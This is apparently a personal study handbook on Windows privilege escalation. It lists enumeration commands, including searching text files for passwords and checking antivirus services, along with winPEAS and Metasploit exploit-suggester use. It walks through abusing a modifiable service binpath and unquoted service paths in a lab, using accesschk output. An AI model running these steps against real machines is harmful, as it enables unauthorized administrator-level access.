
My handbook for Windows Privilege Escalation concepts. Do Check out my Playlist, link: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk
An Important point worth noting is Groups, any user of Group Administrator helps us to escalate!
whoami /priv - current user's privilegesnet users - lists all usersnet user <username> - lists details of a specific userqwinsta - Other users logged in simultaneouslynet localgroup - Groups available in systemnet localgroup <group-name> - list members of a specific groupsysteminfo - gives all the info info about OShostname - hostname of systemfindstr /si password *.txt - we're looking for the files which consist 'password' that too in text fileswmic qfe get Caption,Description,HotFixID,InstalledOn - this tells about the security patches and related informationnetstat -ano - connections associated with the machineschtasks /query /fo LIST /v - to look for any taks that are scheduleddriverquery - lists the driver related informationsc query windefend - looks for Antivirus servicesysteminfo tool in your machine and this is the only requirement for this toolwmic product get name,version,vendor - this gives product name, version, and the vendor. This particular command gives a proper visualisation of what we need.wmic service list brief | findstr "Running" and in order to obtain more information regarding the service use sc qc <ServiceName>post/multi/recon/local_exploit_suggester, make sure that ur session is in background so that this tool works properly or u can simply load it from meterpreter.winpeas.exe --helpsysteminfo command and copy that to any file and name it with extension .txtwinpeas.exe servicesinfo command and we can see the services which are quite helpful
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: ChangeConfig
accesschk.exe /accepteula -uwcqv <current-user> <service>, output is,C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
service_change_config where we can change configuration of the service.sc qc <service> and then note the Binary_path_name(this can be also called as binpath), which we're going to change(evil smile)sc config <service> <option>="<value>"sc config daclsvc binpath="<path>" and now start the service sc start daclsvcVulnerability Insight:
The Windows API must assume where to find the referenced application if the path contains spaces and is not enclosed by quotation marks. If, for example, a service uses the unquoted path:
Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.
C:\Program.exe
C:\Program Files\Ignite.exe
C:\Program Files\Ignite Data\Vuln.exe
C:\Program Files\Ignite Data\Vuln Service\file.exe
servicesinfo, here we can see info if we can exploit any Unquoted Service Path, Here I ran the tool and the interesting part of output is like this,unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected
sc qc <service>C:\Program Files\Unquoted Path Service using accesschk, so run accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service". Output:accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"
C:\Program Files\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators